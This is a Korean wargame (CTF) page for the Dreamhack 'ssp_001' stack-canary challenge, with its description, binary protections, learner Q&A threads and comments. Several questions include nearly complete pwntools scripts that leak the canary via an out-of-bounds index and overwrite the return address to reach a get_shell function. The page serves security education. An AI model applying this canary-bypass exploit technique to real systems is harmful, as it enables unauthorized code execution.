LEVEL 2

ssp_001

pwnable
3809
1978
로그인 하고 문제 풀기
  • 문제 정보
  • 풀이 121
  • 난이도 투표 66
  • 질문 21
  • 최근 풀이자 1978
  • 댓글 73

문제 설명

Description

이 문제는 작동하고 있는 서비스(ssp_001)의 바이너리와 소스코드가 주어집니다.
프로그램의 취약점을 찾고 SSP 방어 기법을 우회하여 익스플로잇해 셸을 획득한 후, "flag" 파일을 읽으세요.
"flag" 파일의 내용을 워게임 사이트에 인증하면 점수를 획득할 수 있습니다.
플래그의 형식은 DH{...} 입니다.

Environment
Ubuntu 16.04
Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)
Reference

Stack Smashing Protector

출제자 정보

avatar
Dreamhack
대표 업적 없음
2020.04.14. 00:00:00

First Blood!

KuroNeko
워게임 고인물
출제된 지 1일 만에 풀이 완료!

난이도 투표 66

질문 21

문제 풀이에 어려움이 있으신가요?
커뮤니티에서 문제에 대한 질문하고 답변 얻기
x32는 카나리가 어...
tmp.jpg 어찌저찌 풀기는 했는데, 카나리가 4byte니까 당연히 rbp-4에 있을 줄 알았는데 rbp-8에 있고 rbp-4에는 뜬금없이 GOT가 있어서 동적디버깅 전까지는 왜 안풀리나 했네요. 근데 저 주소 접근하려고 해도 열리지가 않아서, 뭔가요?🤔 아니 근데 애초에 저게 왜 저기있어요?
juhwisang
답변 0
추천 7
2년 전
질문
+------------------+ <- | name (64) | +------------------+ | box (64) | +------------------+ | canary(4) | +------------------+ | sfp(8) | +------------------+ | ret address | +------------------+ 이렇게 되있으면 카나리를 출력할려면 화살표부터 129, 130, 131, 132 를 출력할때부터 카나리가 나온다고 생각햇는데 128, 129, 130, 131 부터던데 이유가 뭘까요
avatar redticket
답변 1
추천 4
2년 전
canary 값이 왜 출력이 안되는지 궁금합니다
일단 canary 값이 제대로 출력되는지 확인해보려고 했는데, 아래와 같이 실행 결과가 나옵니다 python ssp_001.py [+] Starting local process './ssp_001': pid 35290 [F]ill the box [P]rint the box [E]xit Name Size : Name : stack smashing detected *: terminated [*] Stopped process './ssp_001' (pid 35290) 강의 보면 canary+1까지 값을 채워넣으면 뒤에 값이 같이 출력되서 65개를 넣은건데 제가 잘못 이해했나요? 파이썬 코드는 아래와 같습니다 from pwn import * p = process("./ssp_001") payload = “A”*65 print(p.recvuntil("> ")) p.sendline(“E”) print(p.recvuntil("Name Size : ")) p.sendline(“1024”) print(p.recvuntil("Name : ")) p.sendline(payload) print(p.recv(1024)) `
avatar T@ke_it_EZ
답변 2
추천 3
3년 전
"Name :" 을 왜 못 받아오는 걸까요 ㅠㅠ
File Name: test.py from pwn import * from struct import pack context.log_level = 'debug' HOST = 'host3.dreamhack.games' PORT = 20661 #p = remote(HOST, PORT) p = process("./ssp_001") get_shell = 0x80486b9 canary find cnry = b'' for i in range(4): p.sendafter(b"> ", b"P") p.recvuntil(b"Element index : ") p.sendline(str(128 + i)) p.recvuntil(b"is : ") cnry += p.recvn(2) cnry = int(cnry, 16) print(cnry) cnry = pack("<i", cnry) Payload Write payload = b'A'*64 payload += cnry payload += b"B"*4 payload += b"C"*4 payload += p32(get_shell) Exploit p.sendafter(b"> ", b"E") p.sendafter(b": ", b"100") p.recvuntil(b": ") p.send(payload) p.interactive test.py 실행 후 전체 사진 질문 : "Name size: " 수신 받고 100 바이트 문자열로 보내면 다음 응답을 못 받아오고 멈추네요. 다음 받아야 할 문자가 "Name : " 이니깐, recvuntil(": ") recvuntil("Name : ") sendafter("Name : ", payload) 등.. 다른 걸로 바꿔서 넣어봐도 그대로에요. 초보라 뭘 놓치고 있는 건지 모르겠네요 뭐가 문제인지 아시는 분은 알려주세요 ㅠㅠ
본캐
답변 2
추천 2
10개월 전
디버깅중 오류
워게임중 pwndbg를통해 디버깅을 하려고 하는데 다음과 같이 에러가나네요 64비트 운영체제에서 32비트바이너리 파일을 하려다 보니 생기는 문제같은데 해결방법을 아시는분 계실까요..?? pwndbg> b *main Breakpoint 1 at 0x804872b pwndbg> r Starting program: /home/seonghun/stackcanary/ssp_001 /bin/bash: /home/seonghun/stackcanary/ssp_001: cannot execute binary file: Exec format error /bin/bash: /home/seonghun/stackcanary/ssp_001: Success During startup program exited with code 126.
sshun
답변 1
추천 2
2년 전
쉘이 계속 끊깁니다 ㅠㅜ
익스플로잇 코드를 암만 들여다 봐도 왜 안되는 지 모르겠어서 질문합니다..... 어디가 잘못되었는지 궁금합니다. <Exploit Code> 1 #!/usr/bin/python3 2 from pwn import * 3 4 p = remote("host3.dreamhack.games", 15608) 5 6 shell_addr = 0x80486b9 7 canary = b"" 8 9 for i in range(4) : 10 p.recvuntil("> ") 11 p.send("P") 12 p.recvuntil("index : ") 13 p.sendline(str(0x80 + i)) 14 p.recvuntil("is : ") 15 canary += p.recvn(2) 16 17 canary = int(canary, 16) 18 19 payload = b"A"*0x40 20 payload += p32(canary) 21 payload += b"B"*0x4 22 payload += b"C"*0x4 23 payload += p32(shell_addr) 24 25 p.recvuntil("> ") 26 p.send("E") 27 p.recvuntil("Size : ") 28 p.sendline(str(len(payload))) 29 p.recvuntil("Name : ") 30 p.send(payload) 31 p.interactive() <실행 후 화면>
탈퇴한 이용자
답변 2
추천 2
2년 전
pwntools 오류인가요..??
일단 파이썬으로 값이 잘 넘어가고 넘어오는지 보려고 페이로드 안짜고 툴만 돌려보고 있는데 P를 보내고 recv를 하면 Element index : 라고 나와야하는데 자꾸 가져올게 없대서요.. recv()말고 recvline이나 recvuntil(": ")를 해도 모두 EOFERROR가 떠요 뭐가 문제인가요?? >> p.recvuntil("> ") b'[F]ill the box\n[P]rint the box\n[E]xit\n> ' >> >> p.sendline(b"P") >> p.recv() Traceback (most recent call last): File "<stdin>", line 1, in <module> File "/home/uhihi/.local/lib/python3.9/site-packages/pwnlib/tubes/tube.py", line 105, in recv return self._recv(numb, timeout) or b'' File "/home/uhihi/.local/lib/python3.9/site-packages/pwnlib/tubes/tube.py", line 183, in _recv if not self.buffer and not self._fillbuffer(timeout): File "/home/uhihi/.local/lib/python3.9/site-packages/pwnlib/tubes/tube.py", line 154, in _fillbuffer data = self.recv_raw(self.buffer.get_fill_size()) File "/home/uhihi/.local/lib/python3.9/site-packages/pwnlib/tubes/sock.py", line 56, in recv_raw raise EOFError EOFError
asdry
답변 2
추천 2
2년 전
TypeError: can only concatenate str (not "bytes") to str 오류..
canary += p.recv(2) TypeError: can only concatenate str (not "bytes") to str 자꾸 이런 오류가 뜹니다.. 왜 그러는 걸까요?? 전체 exploit 코드는 다음과 같습니다 from pwn import * p = remote('host3.dreamhack.games', 16228) e = ELF('./ssp_001') canary = '' get_shell = e.symbols['get_shell'] #canary 구하기 for i in range(131, 127, -1): #box + 128 + 4, little endian p.sendafter('>', 'P') p.sendlineafter('Element index :', bytes(str(i), 'utf-8')) p.recvuntil(':') canary += p.recv(2) #canary += chr(int(p.recvline().strip(),16)) canary = int(canary, 16) #16진수 문자열을 10진수 정수로 변경 log.info('[+]canary: 0x%x' %canary) payload = b'A'* 0x40 #name[64] payload += p32(canary) #canary payload += b'B'*8 #dummy+ebp payload += p32(get_shell) #ret overload p.sendafter('>', 'E') p.sendlineafter('Name Size :', '200') p.sendafter('Name :', payload) p.interactive()
avatar 김소정
답변 2
추천 1
30일 전
ssp_001 payload 질문!
from pwn import * p = process('./ssp_001') index = ['131','130','129','128'] cnry = b"0x" for i in list(index): p.sendlineafter('> ','P') p.sendlineafter('Element index : ',i) string = p.recvuntil('is : ') cnry += p.recvn(2) print("canary : "+cnry) cnryval = hex(int(cnry,16)) print(cnryval) p32(cnryval) # 이게 안됨.. p.sendlineafter('> ','E') p.sendlineafter('Name Size : ','300') offset = 64 get_shell = p32(0x80486b9) #payload = b'A'*offset + p32(cnryval) + b'bbbb' + get_shell #p.sendlineafter('Name : ',payload) #p.interactive() for문을 통해 cnry에 카나리 값을 문자열로 저장하고 cnryval에 16진수 값으로 저장했습니다. p32(cnryval)에서 문제가 있어 위 사진처럼 뜹니다.. 문제를 못 찾아서 이렇게 올려봅니다.. pwntools 초보라 가독성이 많이 떨어질 수 있습니다.
oog
답변 1
추천 1
1년 전
TypeError: can only concatenate str (not "bytes") to str
자구 TypeError가 발생하는데, 이유를 모르겠습니다. 1 from pwn import * 2 3 def slog(n, m): return success(": ".join([n, hex(m)])) 4 5 #context.log_level=True 6 7 p=process("./ssp_001") 8 #p=remote("host3.dreamhack.games", 21437) 9 e=ELF("./ssp_001") 10 11 # get_shell() Address 12 get_shell=e.symbols["get_shell"] 13 14 canary=b'' 15 16 for i in range(131, 127, -1): 17 p.sendlineafter(">", "P") 18 p.sendlineafter("index : ", str(i)) 19 p.recvuntil("is : ") 20 canary+=p.recv(2) 21 canary=int(canary, 16) 22 slog("get_shell() ", get_shell) 23 slog("Canary ", canary) 24 25 payload='' 26 payload+='A'*0x40 27 payload+=p32(canary) 28 payload+='B'*4 29 payload+=p32(get_shell) 30 31 p.sendafter("> ", "E") 32 p.sendafter("Size : ", str(0x200)) 33 p.sendlineafter("Name : ", payload) 34 35 p.interactive() slog에서 canary값을 출력할 때 제대로 출력됩니다. 하지만 payload를 보내려고하면 자꾸 TyeError가 발생하는데 왜 에러가 발생하는지를 모르겠습니다. 에러 내용 payload+=p32(canary) TypeError: can only concatenate str (not "bytes") to str
0I0Hackyy
답변 1
추천 0
24일 전

최근 풀이자 1978

Klare
대표 업적 없음
3일 전
목농
대표 업적 없음
3일 전
ccclllara
대표 업적 없음
5일 전
D3lvoid
대표 업적 없음
6일 전
markoza
대표 업적 없음
6일 전
무직쿼카
대표 업적 없음
7일 전
raindrp
대표 업적 없음
7일 전
MoonDJ
대표 업적 없음
7일 전
saintinmay
강의 수강: 10
7일 전
avatar
군인김도현
대표 업적 없음
8일 전

댓글 73

avatar
junan
공부벌레
19일 전
정말 달콤해~
B0n9k
대표 업적 없음
2개월 전
굿굿
avatar
스카이넷
강의 수강: 10
4개월 전
ez
O_F
대표 업적 없음
9개월 전
좀 힘들었습니다.
바꿀수도있는닉네임
대표 업적 없음
10개월 전
r굳
avatar
TEMPEST
워게임: 20
1년 전
댁알이가 아파여
avatar
Rosieblue
워게임 고인물
1년 전
시스템 해킹 로드맵 따라오면서 풀고 있는데 뭔가 워게임다운 문제를 처음으로 풀어보는 느낌이에요 재밌네용 ㅎㅎ 귀찮긴하지만,,,, 열심히 풀어보겠슴당
l000wk3y
공부벌레
1년 전
stack을 직접 그려보면서 사이즈를 계산해보세요. 공부에 도움이 많이 됩니다.
롸플
강의 수강: 10
1년 전
어셈블리어 열심히 읽었습니다.
avatar
Sunja
강의 수강: 10
1년 전
Canary Leak 원리에 대해 제대로 공부하게 되는 문제인듯함..